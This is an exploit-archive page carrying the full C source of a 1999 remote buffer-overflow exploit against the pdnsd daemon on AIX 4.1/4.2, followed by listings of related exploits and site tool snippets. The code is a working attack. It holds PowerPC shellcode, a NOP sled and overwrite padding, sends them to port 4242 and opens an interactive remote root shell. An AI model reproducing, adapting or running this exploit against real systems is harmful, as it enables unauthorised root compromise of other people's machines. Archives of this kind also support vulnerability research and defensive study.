Menu

Search for hundreds of thousands of exploits

"AIX 4.1/4.2 - 'pdnsd' Remote Buffer Overflow"

Author

Exploit author

"Last Stage of Delirium"

Platform

Exploit platform

aix

Release date

Exploit published date

1999-08-17

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
// source: https://www.securityfocus.com/bid/3237/info

The Source Code Browser's Program Database Name Server Daemon (pdnsd) component of the C Set ++ compiler for AIX contains a remotely exploitable buffer overflow. This vulnerability allows local or remote attackers to compromise root privileges on vulnerable systems.

/*## copyright LAST STAGE OF DELIRIUM oct 1999 poland        *://lsd-pl.net/ #*/
/*## pdnsd                                                                   #*/

/*   note: to avoid potential system hang-up please, first obtain the exact   */
/*   AIX OS level with the use of some OS fingerprinting method               */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>

#define ADRNUM 4000
#define NOPNUM 4800
#define ALLIGN 1

#define SCAIX41 "\x03\x68\x41\x5e\x6d\x7f\x6f\xd6\x57\x56\x55\x53"
#define SCAIX42 "\x02\x71\x46\x62\x76\x8e\x78\xe7\x5b\x5a\x59\x58"

char syscallcode[]=
    "\x7e\x94\xa2\x79"     /* xor.    r20,r20,r20            */
    "\x40\x82\xff\xfd"     /* bnel    <syscallcode>          */
    "\x7e\xa8\x02\xa6"     /* mflr    r21                    */
    "\x3a\xc0\x01\xff"     /* lil     r22,0x1ff              */
    "\x3a\xf6\xfe\x2d"     /* cal     r23,-467(r22)          */
    "\x7e\xb5\xba\x14"     /* cax     r21,r21,r23            */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x20"     /* bctr                           */
    "\xff\xff\xff\xff"
    "\xff\xff\xff\xff"
    "\xff\xff\xff\xff"
    "\x4c\xc6\x33\x42"     /* crorc   cr6,cr6,cr6            */
    "\x44\xff\xff\x02"     /* svca    0x0                    */
    "\x3a\xb5\xff\xf8"     /* cal     r21,-8(r21)            */
;

char findsckcode[]=
    "\x2c\x74\x12\x34"     /* cmpi    cr0,r20,0x1234         */
    "\x41\x82\xff\xfd"     /* beql    <findsckcode>          */
    "\x7f\x08\x02\xa6"     /* mflr    r24                    */
    "\x3b\x36\xfe\x2d"     /* cal     r25,-467(r22)          */
    "\x3b\x40\x01\x01"     /* lil     r26,0x16               */
    "\x7f\x78\xca\x14"     /* cax     r27,r24,r25            */
    "\x7f\x69\x03\xa6"     /* mtctr   r27                    */
    "\x4e\x80\x04\x20"     /* bctr                           */
    "\xa3\x78\xff\xfe"     /* lhz     r27,-2(r24)            */
    "\xa3\x98\xff\xfa"     /* lhz     r28,-6(r24)            */
    "\x7c\x1b\xe0\x40"     /* cmpl    cr0,r27,r28            */
    "\x3b\x36\xfe\x59"     /* cal     r25,-423(r22)          */
    "\x41\x82\xff\xe4"     /* beq     <findsckcode+20>       */
    "\x7f\x43\xd3\x78"     /* mr      r3,r26                 */
    "\x38\x98\xff\xfc"     /* cal     r4,-4(r24)             */
    "\x38\xb8\xff\xf4"     /* cal     r5,-12(r24)            */
    "\x93\x38\xff\xf4"     /* st      r25,-12(r24)           */
    "\x88\x55\xff\xf6"     /* lbz     r2,-10(r21)            */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x37\x5a\xff\xff"     /* ai.     r26,r26,-1             */
    "\x2d\x03\xff\xff"     /* cmpi    cr2,r3,-1              */
    "\x40\x8a\xff\xc8"     /* bne     cr2,<findsckcode+32>   */
    "\x40\x82\xff\xd8"     /* bne     <findsckcode+48>       */
    "\x3b\x36\xfe\x03"     /* cal     r25,-509(r22)          */
    "\x3b\x76\xfe\x02"     /* cal     r27,-510(r22)          */
    "\x7f\x23\xcb\x78"     /* mr      r3,r25                 */
    "\x88\x55\xff\xf7"     /* lbz     r2,-9(r21)             */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x7c\x7a\xda\x14"     /* cax     r3,r26,r27             */
    "\x7e\x84\xa3\x78"     /* mr      r4,r20                 */
    "\x7f\x25\xcb\x78"     /* mr      r5,r25                 */
    "\x88\x55\xff\xfb"     /* lbz     r2,-5(r21)             */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x21"     /* bctrl                          */
    "\x37\x39\xff\xff"     /* ai.     r25,r25,-1             */
    "\x40\x80\xff\xd4"     /* bge     <findsckcode+100>      */
;

char shellcode[]=
    "\x7c\xa5\x2a\x79"     /* xor.    r5,r5,r5               */
    "\x40\x82\xff\xfd"     /* bnel    <shellcode>            */
    "\x7f\xe8\x02\xa6"     /* mflr    r31                    */
    "\x3b\xff\x01\x20"     /* cal     r31,0x120(r31)         */
    "\x38\x7f\xff\x08"     /* cal     r3,-248(r31)           */
    "\x38\x9f\xff\x10"     /* cal     r4,-240(r31)           */
    "\x90\x7f\xff\x10"     /* st      r3,-240(r31)           */
    "\x90\xbf\xff\x14"     /* st      r5,-236(r31)           */
    "\x88\x55\xff\xf4"     /* lbz     r2,-12(r21)            */
    "\x98\xbf\xff\x0f"     /* stb     r5,-241(r31)           */
    "\x7e\xa9\x03\xa6"     /* mtctr   r21                    */
    "\x4e\x80\x04\x20"     /* bctr                           */
    "/bin/sh"
;

char nop[]="\x7f\xff\xfb\x78";

main(int argc,char **argv){
    char buffer[10000],address[4],*b;
    int i,n,l,cnt,sck;
    struct hostent *hp;
    struct sockaddr_in adr;

    printf("copyright LAST STAGE OF DELIRIUM oct 1999 poland  //lsd-pl.net/\n");
    printf("pdnsd for AIX 4.1 4.2 PowerPC/POWER\n\n");

    if(argc!=3){
        printf("usage: %s address 41|42\n",argv[0]);exit(-1);
    }

    switch(atoi(argv[2])){
    case 41: memcpy(&syscallcode[32],SCAIX41,12); break;
    case 42: memcpy(&syscallcode[32],SCAIX42,12); break;
    default: exit(-1);
    }

    sck=socket(AF_INET,SOCK_STREAM,0);
    adr.sin_family=AF_INET;
    adr.sin_port=htons(4242);
    if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
        if((hp=gethostbyname(argv[1]))==NULL){
            errno=EADDRNOTAVAIL;perror("error");exit(-1);
        }
        memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
    }

    if(connect(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){
        perror("error");exit(-1);
    }

    l=ADRNUM+NOPNUM+strlen(shellcode);
    *((unsigned long*)address)=htonl(0x2ff20908+(NOPNUM>>1));

    i=sizeof(struct sockaddr_in);
    if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
        struct netbuf {unsigned int maxlen;unsigned int len;char *buf;}nb;
        ioctl(sck,(('S'<<8)|2),"sockmod");
        nb.maxlen=0xffff;
        nb.len=sizeof(struct sockaddr_in);;
        nb.buf=(char*)&adr;
        ioctl(sck,(('T'<<8)|144),&nb);
    }
    n=ntohs(adr.sin_port);
    printf("port=%d connected! ",n);fflush(stdout);

    findsckcode[0+2]=(unsigned char)((n&0xff00)>>8);
    findsckcode[0+3]=(unsigned char)(n&0xff);

    b=buffer;
    *((unsigned long*)b)=htonl(l);
    b+=4;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(syscallcode);i++) *b++=syscallcode[i];
    for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
    for(i=0;i<strlen(shellcode);i++)   *b++=shellcode[i];
    for(i=0;i<ALLIGN;i++) *b++=address[i%4];
    for(i=0;i<ADRNUM;i++) *b++=address[i%4];
    *b=0;

    write(sck,buffer,4+l-1);sleep(3);
    send(sck,"x",1,0);
    printf("sent!\n");

    write(sck,"/bin/uname -a\n",14);
    while(1){
        fd_set fds;
        FD_ZERO(&fds);
        FD_SET(0,&fds);
        FD_SET(sck,&fds);
        if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
            int cnt;
            char buf[1024];
            if(FD_ISSET(0,&fds)){
                if((cnt=read(0,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                    else break;
                }
                write(sck,buf,cnt);
            }
            if(FD_ISSET(sck,&fds)){
                if((cnt=read(sck,buf,1024))<1){
                    if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
                    else break;
                }
                write(1,buf,cnt);
            }
        }
    }
}
Release Date Title Type Platform Author
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
Release Date Title Type Platform Author
2018-12-04 "Xorg X11 Server (AIX) - Local Privilege Escalation" local aix 0xdono
2017-03-07 "Bull/IBM AIX Clusterwatch/Watchware - Multiple Vulnerabilities" webapps aix RandoriSec
2016-12-22 "IBM AIX 6.1/7.1/7.2 - 'Bellmail' Local Privilege Escalation" local aix "Hector X. Monsegur"
2016-11-04 "IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Local Privilege Escalation" local aix "Hector X. Monsegur"
2016-11-04 "IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Local Privilege Escalation" local aix "Hector X. Monsegur"
2015-10-30 "AIX 7.1 - 'lquerylv' Local Privilege Escalation" local aix "S2 Crew"
2015-09-08 "IBM AIX High Availability Cluster Multiprocessing (HACMP) - Local Privilege Escalation" local aix "Kristian Erik Hermansen"
2014-11-24 "RobotStats 1.0 - HTML Injection" dos aix "ZoRLu Bugrahan"
2014-09-09 "PHP Stock Management System 1.02 - Multiple Vulnerabilities" dos aix jsass
2014-07-01 "Flussonic Media Server 4.1.25 < 4.3.3 - Arbitrary File Disclosure" dos aix "BGA Security"
Release Date Title Type Platform Author
2003-10-22 "Sun Java Virtual Machine 1.x - Slash Path Security Model Circumvention" dos multiple "Last Stage of Delirium"
2003-03-02 "Sendmail 8.12.x - Header Processing Buffer Overflow (1)" remote unix "Last Stage of Delirium"
2003-02-12 "HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (1)" local hp-ux "Last Stage of Delirium"
2003-02-12 "HP-UX 10.x - rs.F3000 Unauthorized Access" local hp-ux "Last Stage of Delirium"
2002-11-21 "Microsoft Java Virtual Machine 3802 Series - Bytecode Verifier" remote windows "Last Stage of Delirium"
2002-11-21 "Sun/Netscape Java Virtual Machine1.x - Bytecode Verifier" remote multiple "Last Stage of Delirium"
2002-11-21 "Symantec Java! JustInTime Compiler 210.65 - Command Execution" remote windows "Last Stage of Delirium"
2002-06-20 "SGI IRIX 6.x - 'rpc.xfsmd' Remote Command Execution" remote irix "Last Stage of Delirium"
2002-01-01 "Solaris 2/7/8/9 cachefsd - Remote Heap Overflow" remote solaris "Last Stage of Delirium"
2001-04-11 "SGI IRIX 6.5 / Solaris 7.0/8 CDE - '/usr/dt/bin/dtsession' Local Buffer Overflow" local unix "Last Stage of Delirium"
2001-03-15 "Solaris 2.6/7.0/8 - snmpXdmid Buffer Overflow" remote solaris "Last Stage of Delirium"
2000-12-01 "IBM AIX 4.3.x - '/usr/lib/lpd/piobe' Local Buffer Overflow" local aix "Last Stage of Delirium"
2000-12-01 "IBM AIX 4.3 - '/usr/lib/lpd/digest' Local Buffer Overflow" local aix "Last Stage of Delirium"
2000-12-01 "IBM AIX 4.x - '/usr/bin/setsenv' Local Buffer Overflow" local aix "Last Stage of Delirium"
2000-09-01 "AIX 4.2/4.3 - '/usr/lib/lpd/pio/etc/piomkapqd' Local Buffer Overflow" local aix "Last Stage of Delirium"
2000-08-02 "IRIX 6.5.x - '/usr/sbin/dmplay' Local Buffer Overflow" local irix "Last Stage of Delirium"
2000-07-01 "IRIX 5.2/5.3/6.x - TelnetD Environment Variable Format String" remote irix "Last Stage of Delirium"
2000-03-29 "SGI IRIX 5.x/6.x - Objectserver" remote irix "Last Stage of Delirium"
2000-01-01 "IRIX 6.5.x - '/usr/lib/InPerson/inpview' Race Condition" local irix "Last Stage of Delirium"
1999-12-20 "SCO Open Server 5.0.5 / IRIX 6.2 ibX11/X11 Toolkit/Athena Widget Library - Local Buffer Overflow" local multiple "Last Stage of Delirium"
1999-12-01 "Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (2)" local solaris "Last Stage of Delirium"
1999-12-01 "Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (1)" local solaris "Last Stage of Delirium"
1999-08-17 "AIX 4.1/4.2 - 'pdnsd' Remote Buffer Overflow" remote aix "Last Stage of Delirium"
1999-07-19 "SGI Advanced Linux Environment 3.0 / SGI IRIX 6.5.4 / SGI UNICOS 10.0 6 - arrayd.auth Default Configuration" remote multiple "Last Stage of Delirium"
1999-07-13 "Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (1)" remote multiple "Last Stage of Delirium"
1998-11-01 "IRIX 6.2/6.3 - '/bin/lpstat' Local Buffer Overflow" local irix "Last Stage of Delirium"
1998-04-01 "Solaris x86 2.4/2.5 - nlps_server Buffer Overflow" remote solaris "Last Stage of Delirium"
1997-09-01 "SGI IRIX 6.2 - 'libgl.so' Local Buffer Overflow" local irix "Last Stage of Delirium"
1997-09-01 "IRIX 5.3/6.x - '/usr/bin/mail' Local Buffer Overflow" local irix "Last Stage of Delirium"
1997-07-17 "SGI IRIX 6.3 - 'pset' Local Privilege Escalation" local irix "Last Stage of Delirium" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected